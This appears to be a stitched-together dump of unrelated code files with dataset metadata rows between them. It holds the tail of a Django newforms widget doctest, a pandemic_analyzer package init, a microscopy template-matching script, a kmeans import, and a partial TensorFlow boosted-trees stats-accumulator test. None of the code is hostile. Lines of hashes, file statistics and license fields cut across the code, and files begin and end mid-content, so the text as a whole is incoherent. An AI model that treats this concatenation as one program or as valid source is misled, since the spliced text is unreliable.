<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="mydate_year">
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
<option value="2010">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
</select>
>>> w.render('mydate', None) == w.render('mydate', '')
True
>>> print w.render('mydate', '2010-04-15')
<select name="mydate_month">
<option value="1">January</option>
<option value="2">February</option>
<option value="3">March</option>
<option value="4" selected="selected">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>
<option value="12">December</option>
</select>
<select name="mydate_day">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15" selected="selected">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select name="mydate_year">
<option value="2007">2007</option>
<option value="2008">2008</option>
<option value="2009">2009</option>
<option value="2010" selected="selected">2010</option>
<option value="2011">2011</option>
<option value="2012">2012</option>
<option value="2013">2013</option>
<option value="2014">2014</option>
<option value="2015">2015</option>
<option value="2016">2016</option>
</select>
# MultiWidget and MultiValueField #############################################
# MultiWidgets are widgets composed of other widgets. They are usually
# combined with MultiValueFields - a field that is composed of other fields.
# MulitWidgets can themselved be composed of other MultiWidgets.
# SplitDateTimeWidget is one example of a MultiWidget.
>>> class ComplexMultiWidget(MultiWidget):
... def __init__(self, attrs=None):
... widgets = (
... TextInput(),
... SelectMultiple(choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))),
... SplitDateTimeWidget(),
... )
... super(ComplexMultiWidget, self).__init__(widgets, attrs)
...
... def decompress(self, value):
... if value:
... data = value.split(',')
... return [data[0], data[1], datetime.datetime(*time.strptime(data[2], "%Y-%m-%d %H:%M:%S")[0:6])]
... return [None, None, None]
... def format_output(self, rendered_widgets):
... return u'\n'.join(rendered_widgets)
>>> w = ComplexMultiWidget()
>>> print w.render('name', 'some text,JP,2007-04-25 06:24:00')
<input type="text" name="name_0" value="some text" />
<select multiple="multiple" name="name_1">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
<input type="text" name="name_2_0" value="2007-04-25" /><input type="text" name="name_2_1" value="06:24:00" />
>>> class ComplexField(MultiValueField):
... def __init__(self, required=True, widget=None, label=None, initial=None):
... fields = (
... CharField(),
... MultipleChoiceField(choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo'))),
... SplitDateTimeField()
... )
... super(ComplexField, self).__init__(fields, required, widget, label, initial)
...
... def compress(self, data_list):
... if data_list:
... return '%s,%s,%s' % (data_list[0],''.join(data_list[1]),data_list[2])
... return None
>>> f = ComplexField(widget=w)
>>> f.clean(['some text', ['J','P'], ['2007-04-25','6:24:00']])
u'some text,JP,2007-04-25 06:24:00'
>>> f.clean(['some text',['X'], ['2007-04-25','6:24:00']])
Traceback (most recent call last):
...
ValidationError: [u'Select a valid choice. X is not one of the available choices.']
# If insufficient data is provided, None is substituted
>>> f.clean(['some text',['JP']])
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> class ComplexFieldForm(Form):
... field1 = ComplexField(widget=w)
>>> f = ComplexFieldForm()
>>> print f
<tr><th><label for="id_field1_0">Field1:</label></th><td><input type="text" name="field1_0" id="id_field1_0" />
<select multiple="multiple" name="field1_1" id="id_field1_1">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
<input type="text" name="field1_2_0" id="id_field1_2_0" /><input type="text" name="field1_2_1" id="id_field1_2_1" /></td></tr>
>>> f = ComplexFieldForm({'field1_0':'some text','field1_1':['J','P'], 'field1_2_0':'2007-04-25', 'field1_2_1':'06:24:00'})
>>> print f
<tr><th><label for="id_field1_0">Field1:</label></th><td><input type="text" name="field1_0" value="some text" id="id_field1_0" />
<select multiple="multiple" name="field1_1" id="id_field1_1">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
<input type="text" name="field1_2_0" value="2007-04-25" id="id_field1_2_0" /><input type="text" name="field1_2_1" value="06:24:00" id="id_field1_2_1" /></td></tr>
>>> f.cleaned_data
{'field1': u'some text,JP,2007-04-25 06:24:00'}
#################################
# Tests of underlying functions #
#################################
# smart_unicode tests
>>> from django.utils.encoding import smart_unicode
>>> class Test:
... def __str__(self):
... return 'ŠĐĆŽćžšđ'
>>> class TestU:
... def __str__(self):
... return 'Foo'
... def __unicode__(self):
... return u'\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111'
>>> smart_unicode(Test())
u'\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111'
>>> smart_unicode(TestU())
u'\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111'
>>> smart_unicode(1)
u'1'
>>> smart_unicode('foo')
u'foo'
# flatatt tests
>>> from django.newforms.util import flatatt
>>> flatatt({'id': "header"})
u' id="header"'
>>> flatatt({'class': "news", 'title': "Read this"})
u' class="news" title="Read this"'
>>> flatatt({})
u''
####################################
# Test accessing errors in clean() #
####################################
>>> class UserForm(Form):
... username = CharField(max_length=10)
... password = CharField(widget=PasswordInput)
... def clean(self):
... data = self.cleaned_data
... if not self.errors:
... data['username'] = data['username'].lower()
... return data
>>> f = UserForm({'username': 'SirRobin', 'password': 'blue'})
>>> f.is_valid()
True
>>> f.cleaned_data['username']
u'sirrobin'
"""
__test__ = {
'form_tests': form_tests,
'localflavor': localflavor_tests,
'regressions': regression_tests,
}
if __name__ == "__main__":
import doctest
doctest.testmod()
| 41.932213 | 553 | 0.648468 | 22,668 | 154,646 | 4.365581 | 0.039836 | 0.044928 | 0.031791 | 0.039683 | 0.797664 | 0.775149 | 0.756768 | 0.735658 | 0.71375 | 0.687456 | 0 | 0.031733 | 0.113181 | 154,646 | 3,687 | 554 | 41.943586 | 0.689842 | 0.000136 | 0 | 0.675236 | 0 | 0.170213 | 0.998344 | 0.212808 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.056442 | 0.00591 | 0 | 0.00591 | 0.059693 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
48604cf6fc1a429122dce7274c6f970884dc015d | 168 | py | Python | pandemic_analyzer/pandemic_analyzer/__init__.py | deselmo/PandemicSimulator | 8752e6ce50cc0a61084c265322049bc46d5893ec | [
"MIT"
] | null | null | null | pandemic_analyzer/pandemic_analyzer/__init__.py | deselmo/PandemicSimulator | 8752e6ce50cc0a61084c265322049bc46d5893ec | [
"MIT"
] | null | null | null | pandemic_analyzer/pandemic_analyzer/__init__.py | deselmo/PandemicSimulator | 8752e6ce50cc0a61084c265322049bc46d5893ec | [
"MIT"
] | null | null | null | from pandemic_analyzer.analyzer_epochs import AnalyzerEpochs
from pandemic_analyzer.analyzer_graph import AnalyzerGraph
from pandemic_analyzer.analyzer import Analyzer
| 42 | 60 | 0.910714 | 20 | 168 | 7.4 | 0.4 | 0.243243 | 0.405405 | 0.567568 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.071429 | 168 | 3 | 61 | 56 | 0.948718 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
48707771c3b04eeef27d1c6fb8111ec941a87182 | 5,188 | py | Python | script_bests.py | brunoggregorio/DCNN-feature-extraction | 08b6bc751612f98a147afbe55051d3c3aec3693e | [
"Apache-2.0"
] | null | null | null | script_bests.py | brunoggregorio/DCNN-feature-extraction | 08b6bc751612f98a147afbe55051d3c3aec3693e | [
"Apache-2.0"
] | 10 | 2020-09-25T22:16:54.000Z | 2022-02-10T02:53:43.000Z | script_bests.py | brunoggregorio/DCNN-feature-extraction | 08b6bc751612f98a147afbe55051d3c3aec3693e | [
"Apache-2.0"
] | null | null | null | """!
"""
import numpy as np
from dcnn_mtm import dcnn_mtm
# Create global variables
# =======================
base_path = "/home/brunoggregorio/Workspace/data/dataset/"
min_side = 1000
max_side = 1400
thres_feature = 0.9
retained_value = 0.1
radius_feature = 5.0
pyramid_levels = 1
thres_ecc = 0.62
constant = -25.5
thres_binary = np.arange(0.7, 0.96, 0.05)
# =====================================================
# BRAIN 1
# =====================================================
video = "brain_1"
folder_path = base_path + video + "/frames/"
mask_img = base_path + video + "/" + video + "_mask.png"
ground_truth = base_path + video + "/" + video + "_gt.txt"
n_tmpl = '3'
model = 'VGG19'
thresh = 0.85
template = base_path + video + "/" + video + "_" + n_tmpl + "-templates.txt"
print("Video: {}, model={}, #tmpl={}, thresh={:.2f}".format(video, model, n_tmpl, thresh))
dcnn_mtm(folder_path=folder_path,
mask_img=mask_img,
ground_truth=ground_truth,
template=template,
dcnn_model=model,
thres_binary=thresh,
output_points='B1_output2D_centroids.txt',
verbosity=False)
# =====================================================
# BRAIN 2
# =====================================================
video = "brain_2"
folder_path = base_path + video + "/frames/"
mask_img = base_path + video + "/" + video + "_mask.png"
ground_truth = base_path + video + "/" + video + "_gt.txt"
n_tmpl = '3'
model = 'DenseNet121'
thresh = 0.90
template = base_path + video + "/" + video + "_" + n_tmpl + "-templates.txt"
print("Video: {}, model={}, #tmpl={}, thresh={:.2f}".format(video, model, n_tmpl, thresh))
dcnn_mtm(folder_path=folder_path,
mask_img=mask_img,
ground_truth=ground_truth,
template=template,
dcnn_model=model,
thres_binary=thresh,
output_points='B2_output2D_centroids.txt',
verbosity=False)
# =====================================================
# SPINALCORD 1
# =====================================================
video = "spinalcord_1"
folder_path = base_path + video + "/frames/"
mask_img = base_path + video + "/" + video + "_mask.png"
ground_truth = base_path + video + "/" + video + "_gt.txt"
n_tmpl = '1'
model = 'ResNet50'
thresh = 0.80
template = base_path + video + "/" + video + "_" + n_tmpl + "-templates.txt"
print("Video: {}, model={}, #tmpl={}, thresh={:.2f}".format(video, model, n_tmpl, thresh))
dcnn_mtm(folder_path=folder_path,
mask_img=mask_img,
ground_truth=ground_truth,
template=template,
dcnn_model=model,
thres_binary=thresh,
output_points='SC_output2D_centroids.txt',
verbosity=False)
# =====================================================
# CREMASTER 1
# =====================================================
video = "cremaster_1"
folder_path = base_path + video + "/frames/"
mask_img = base_path + video + "/" + video + "_mask.png"
ground_truth = base_path + video + "/" + video + "_gt.txt"
n_tmpl = '2'
model = 'VGG19'
thresh = 0.85
template = base_path + video + "/" + video + "_" + n_tmpl + "-templates.txt"
print("Video: {}, model={}, #tmpl={}, thresh={:.2f}".format(video, model, n_tmpl, thresh))
dcnn_mtm(folder_path=folder_path,
mask_img=mask_img,
ground_truth=ground_truth,
template=template,
dcnn_model=model,
thres_binary=thresh,
output_points='C1_output2D_centroids.txt',
verbosity=False)
# =====================================================
# CREMASTER 2
# =====================================================
video = "cremaster_2"
folder_path = base_path + video + "/frames/"
mask_img = base_path + video + "/" + video + "_mask.png"
ground_truth = base_path + video + "/" + video + "_gt.txt"
n_tmpl = '3'
model = 'VGG16'
thresh = 0.80
template = base_path + video + "/" + video + "_" + n_tmpl + "-templates.txt"
print("Video: {}, model={}, #tmpl={}, thresh={:.2f}".format(video, model, n_tmpl, thresh))
dcnn_mtm(folder_path=folder_path,
mask_img=mask_img,
ground_truth=ground_truth,
template=template,
dcnn_model=model,
thres_binary=thresh,
output_points='C2_output2D_centroids.txt',
verbosity=False)
# =====================================================
# MESENTERY 1
# =====================================================
video = "mesentery_1"
folder_path = base_path + video + "/frames/"
mask_img = base_path + video + "/" + video + "_mask.png"
ground_truth = base_path + video + "/" + video + "_gt.txt"
n_tmpl = '2'
model = 'VGG16'
thresh = 0.75
template = base_path + video + "/" + video + "_" + n_tmpl + "-templates.txt"
print("Video: {}, model={}, #tmpl={}, thresh={:.2f}".format(video, model, n_tmpl, thresh))
dcnn_mtm(folder_path=folder_path,
mask_img=mask_img,
ground_truth=ground_truth,
template=template,
dcnn_model=model,
thres_binary=thresh,
output_points='ME_output2D_centroids.txt',
verbosity=False) | 29.816092 | 90 | 0.539129 | 574 | 5,188 | 4.581882 | 0.151568 | 0.076046 | 0.118631 | 0.123194 | 0.843346 | 0.791635 | 0.758935 | 0.758935 | 0.758935 | 0.758935 | 0 | 0.022711 | 0.202197 | 5,188 | 174 | 91 | 29.816092 | 0.612708 | 0.168658 | 0 | 0.745614 | 0 | 0 | 0.189832 | 0.045243 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017544 | 0 | 0.017544 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d20a23d97bcbb6ba2a8e98bb85d0fb0c2507ca07 | 41 | py | Python | utils/dpbench_python/kmeans/__init__.py | geexie/dpbench | 7d41409ded3c816f35003bc5aea071852bceb892 | [
"BSD-2-Clause"
] | 8 | 2021-03-26T15:17:58.000Z | 2022-01-21T21:56:19.000Z | utils/dpbench_python/kmeans/__init__.py | geexie/dpbench | 7d41409ded3c816f35003bc5aea071852bceb892 | [
"BSD-2-Clause"
] | 22 | 2021-03-30T21:20:57.000Z | 2022-02-22T13:42:17.000Z | utils/dpbench_python/kmeans/__init__.py | geexie/dpbench | 7d41409ded3c816f35003bc5aea071852bceb892 | [
"BSD-2-Clause"
] | 7 | 2021-03-23T11:00:43.000Z | 2022-02-02T12:28:55.000Z | from .kmeans_python import kmeans_python
| 20.5 | 40 | 0.878049 | 6 | 41 | 5.666667 | 0.666667 | 0.705882 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.918919 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
d21a0f16621f720d496d962030af35428cc044ef | 20,880 | py | Python | tensorflow/contrib/boosted_trees/python/kernel_tests/stats_accumulator_ops_test.py | MathMachado/tensorflow | 56afda20b15f234c23e8393f7e337e7dd2659c2d | [
"Apache-2.0"
] | 848 | 2019-12-03T00:16:17.000Z | 2022-03-31T22:53:17.000Z | tensorflow/contrib/boosted_trees/python/kernel_tests/stats_accumulator_ops_test.py | MathMachado/tensorflow | 56afda20b15f234c23e8393f7e337e7dd2659c2d | [
"Apache-2.0"
] | 656 | 2019-12-03T00:48:46.000Z | 2022-03-31T18:41:54.000Z | tensorflow/contrib/boosted_trees/python/kernel_tests/stats_accumulator_ops_test.py | MathMachado/tensorflow | 56afda20b15f234c23e8393f7e337e7dd2659c2d | [
"Apache-2.0"
] | 506 | 2019-12-03T00:46:26.000Z | 2022-03-30T10:34:56.000Z | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test for checking stats accumulator related ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib.boosted_trees.python.ops import stats_accumulator_ops
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import test_util
from tensorflow.python.platform import googletest
class StatsAccumulatorScalarTest(test_util.TensorFlowTestCase):
"""Tests for scalar gradients and hessians accumulator."""
def testSimpleAcculumator(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([]),
hessian_shape=tensor_shape.TensorShape([]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 0], [3, 0]],
gradients=[0.1, 0.3],
hessians=[0.2, 0.4])
op2 = accumulator.add(0, [1], [[2, 0]], [0.1], [0.2])
with ops.control_dependencies([op1, op2]):
num_updates, partition, bucket_ids, grads, hessians = accumulator.flush(
stamp_token=0, next_stamp_token=1)
num_updates, partition, bucket_ids, grads, hessians = sess.run(
[num_updates, partition, bucket_ids, grads, hessians])
result = _AccumulatorResultToDict(partition, bucket_ids, grads, hessians)
self.assertEqual(num_updates, 2)
self.assertEqual(len(result), 2)
# Key is partition, bucket, dimension
self.assertAllClose(result[(1, 2, 0)], [0.2, 0.4])
self.assertAllClose(result[(2, 3, 0)], [0.3, 0.4])
def testMultidimensionalAcculumator(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([]),
hessian_shape=tensor_shape.TensorShape([]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2, 1],
feature_ids=[[2, 2], [3, 0], [2, 2]],
gradients=[0.1, 0.3, 0.8],
hessians=[0.2, 0.4, -9])
op2 = accumulator.add(0, [2, 1], [[3, 1], [2, 2]], [0.1, 1], [0.2, -1])
with ops.control_dependencies([op1, op2]):
num_updates, partition, bucket_ids, grads, hessians = accumulator.flush(
stamp_token=0, next_stamp_token=1)
num_updates, partition, bucket_ids, grads, hessians = sess.run(
[num_updates, partition, bucket_ids, grads, hessians])
result = _AccumulatorResultToDict(partition, bucket_ids, grads, hessians)
self.assertEqual(num_updates, 2)
self.assertEqual(len(result), 3)
# Key is partition, bucket, dimension.
self.assertAllClose(result[(1, 2, 2)], [1.9, -9.8])
self.assertAllClose(result[(2, 3, 0)], [0.3, 0.4])
self.assertAllClose(result[(2, 3, 1)], [0.1, 0.2])
def testDropStaleUpdate(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([]),
hessian_shape=tensor_shape.TensorShape([]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 0], [3, 0]],
gradients=[0.1, 0.3],
hessians=[0.2, 0.4])
op2 = accumulator.add(
stamp_token=-1,
partition_ids=[1],
feature_ids=[[2, 0]],
gradients=[0.1],
hessians=[0.2])
with ops.control_dependencies([op1, op2]):
num_updates, partition, feature, grads, hessians = accumulator.flush(
stamp_token=0, next_stamp_token=1)
num_updates, partition, feature, grads, hessians = sess.run(
[num_updates, partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads, hessians)
self.assertEqual(num_updates, 1)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(1, 2, 0)], [0.1, 0.2])
self.assertAllClose(result[(2, 3, 0)], [0.3, 0.4])
def testSerialize(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([]),
hessian_shape=tensor_shape.TensorShape([]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 0], [3, 0]],
gradients=[0.1, 0.3],
hessians=[0.2, 0.4])
with ops.control_dependencies([op1]):
(stamp_token, num_updates, partition_1, feature_1, grads_1,
hessians_1) = accumulator.saveable.serialize()
# Make sure that the accumulator hasn't changed during serialization.
with ops.control_dependencies([stamp_token]):
num_updates_2, partition_2, feature_2, grads_2, hessians_2 = (
accumulator.flush(stamp_token=0, next_stamp_token=1))
(stamp_token, num_updates, partition_1, feature_1, grads_1, hessians_1,
num_updates_2, partition_2, feature_2, grads_2, hessians_2) = sess.run(
[
stamp_token, num_updates, partition_1, feature_1, grads_1,
hessians_1, num_updates_2, partition_2, feature_2, grads_2,
hessians_2
])
result_1 = _AccumulatorResultToDict(partition_1, feature_1, grads_1,
hessians_1)
result_2 = _AccumulatorResultToDict(partition_2, feature_2, grads_2,
hessians_2)
self.assertEqual(num_updates, 1)
self.assertEqual(num_updates_2, 1)
self.assertEqual(len(result_1), 2)
self.assertAllClose(result_1[(1, 2, 0)], [0.1, 0.2])
self.assertAllClose(result_1[(2, 3, 0)], [0.3, 0.4])
self.assertAllEqual(result_1, result_2)
self.assertEqual(0, stamp_token)
def testDeserialize(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([]),
hessian_shape=tensor_shape.TensorShape([]))
with ops.control_dependencies([accumulator.initializer]):
# These will be deleted due to deserialize call.
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 0], [3, 1]],
gradients=[0.1, 0.3],
hessians=[0.2, 0.4])
with ops.control_dependencies([op1]):
deserialize = (
accumulator.saveable.deserialize(
stamp_token=2,
num_updates=3,
partition_ids=[3, 4],
feature_ids=[[5, 0], [6, 2]],
gradients=[0.4, 0.5],
hessians=[0.6, 0.7]))
with ops.control_dependencies([deserialize]):
num_updates, partition, feature, grads, hessians = accumulator.flush(
stamp_token=2, next_stamp_token=3)
num_updates, partition, feature, grads, hessians = sess.run(
[num_updates, partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads,
hessians)
self.assertEqual(num_updates, 3)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(3, 5, 0)], [0.4, 0.6])
self.assertAllClose(result[(4, 6, 2)], [0.5, 0.7])
def testMakeSummary(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([]),
hessian_shape=tensor_shape.TensorShape([]))
partition, feature, grads, hessians = accumulator._make_summary(
partition_ids=[1, 2, 1],
feature_ids=[[2, 0], [3, 1], [2, 0]],
gradients=[0.1, 0.3, 0.1],
hessians=[0.2, 0.4, 0.2])
partition, feature, grads, hessians = sess.run(
[partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads, hessians)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(1, 2, 0)], [0.2, 0.4])
self.assertAllClose(result[(2, 3, 1)], [0.3, 0.4])
class StatsAccumulatorTensorTest(test_util.TensorFlowTestCase):
"""Tests for tensor gradients and hessians accumulator."""
def testSimpleAcculumator(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([2]),
hessian_shape=tensor_shape.TensorShape([2, 2]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 0], [3, 0]],
# Two values for gradients,
gradients=[[0.1, 0.1], [0.2, 0.2]],
# A 2x2 matrix for each hessian.
hessians=[[[0.01, 0.02], [0.03, 0.04]], [[0.05, 0.06], [0.07,
0.08]]])
op2 = accumulator.add(
stamp_token=0,
partition_ids=[1],
feature_ids=[[2, 0]],
gradients=[[0.10, 0.11]],
hessians=[[[0.011, 0.022], [0.033, 0.044]]])
with ops.control_dependencies([op1, op2]):
num_updates, partition, feature, grads, hessians = accumulator.flush(
stamp_token=0, next_stamp_token=1)
num_updates, partition, feature, grads, hessians = sess.run(
[num_updates, partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads, hessians)
self.assertEqual(num_updates, 2)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(1, 2, 0)][0], [0.20, 0.21])
self.assertAllClose(result[(1, 2, 0)][1],
[[0.021, 0.042], [0.063, 0.084]])
self.assertAllClose(result[(2, 3, 0)][0], [0.2, 0.2])
self.assertAllClose(result[(2, 3, 0)][1], [[0.05, 0.06], [0.07, 0.08]])
def testMultidimensionalAcculumator(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([2]),
hessian_shape=tensor_shape.TensorShape([2, 2]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 4], [3, 1]],
# Two values for gradients,
gradients=[[0.1, 0.1], [0.2, 0.2]],
# A 2x2 matrix for each hessian.
hessians=[[[0.01, 0.02], [0.03, 0.04]], [[0.05, 0.06], [0.07,
0.08]]])
op2 = accumulator.add(
stamp_token=0,
partition_ids=[1],
feature_ids=[[2, 4]],
gradients=[[0.10, 0.11]],
hessians=[[[0.011, 0.022], [0.033, 0.044]]])
with ops.control_dependencies([op1, op2]):
num_updates, partition, feature, grads, hessians = accumulator.flush(
stamp_token=0, next_stamp_token=1)
num_updates, partition, feature, grads, hessians = sess.run(
[num_updates, partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads, hessians)
self.assertEqual(num_updates, 2)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(1, 2, 4)][0], [0.20, 0.21])
self.assertAllClose(result[(1, 2, 4)][1],
[[0.021, 0.042], [0.063, 0.084]])
self.assertAllClose(result[(2, 3, 1)][0], [0.2, 0.2])
self.assertAllClose(result[(2, 3, 1)][1], [[0.05, 0.06], [0.07, 0.08]])
def testDropStaleUpdate(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([2]),
hessian_shape=tensor_shape.TensorShape([2, 2]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 5], [3, 0]],
# Two values for gradients,
gradients=[[0.1, 0.1], [0.2, 0.2]],
# A 2x2 matrix for each hessian.
hessians=[[[0.01, 0.02], [0.03, 0.04]], [[0.05, 0.06], [0.07,
0.08]]])
op2 = accumulator.add(
stamp_token=-1,
partition_ids=[1],
feature_ids=[[2, 5]],
gradients=[[0.10, 0.11]],
hessians=[[[0.011, 0.022], [0.033, 0.044]]])
with ops.control_dependencies([op1, op2]):
num_updates, partition, feature, grads, hessians = accumulator.flush(
stamp_token=0, next_stamp_token=1)
num_updates, partition, feature, grads, hessians = sess.run(
[num_updates, partition, feature, grads, hessians])
result = _AccumulatorResultToDict(partition, feature, grads, hessians)
self.assertEqual(num_updates, 1)
self.assertEqual(len(result), 2)
self.assertAllClose(result[(1, 2, 5)][0], [0.1, 0.1])
self.assertAllClose(result[(1, 2, 5)][1], [[0.01, 0.02], [0.03, 0.04]])
self.assertAllClose(result[(2, 3, 0)][0], [0.2, 0.2])
self.assertAllClose(result[(2, 3, 0)][1], [[0.05, 0.06], [0.07, 0.08]])
def testSerialize(self):
with self.cached_session() as sess:
accumulator = stats_accumulator_ops.StatsAccumulator(
stamp_token=0,
gradient_shape=tensor_shape.TensorShape([2]),
hessian_shape=tensor_shape.TensorShape([2, 2]))
with ops.control_dependencies([accumulator.initializer]):
op1 = accumulator.add(
stamp_token=0,
partition_ids=[1, 2],
feature_ids=[[2, 0], [3, 0]],
# Two values for gradients,
gradients=[[0.1, 0.1], [0.2, 0.2]],
# A 2x2 matrix for each hessian.
hessians=[[[0.01, 0.02], [0.03, 0.04]], [[0.05, 0.06], [0.07,
0.08]]])
with ops.control_dependencies([op1]):
(stamp_token, num_updates_1, partition_1, feature_1, grads_1,
hessians_1) = accumulator.saveable.serialize()
# Make sure that the accumulator hasn't changed during serialization.
with ops.control_dependencies([stamp_token]):
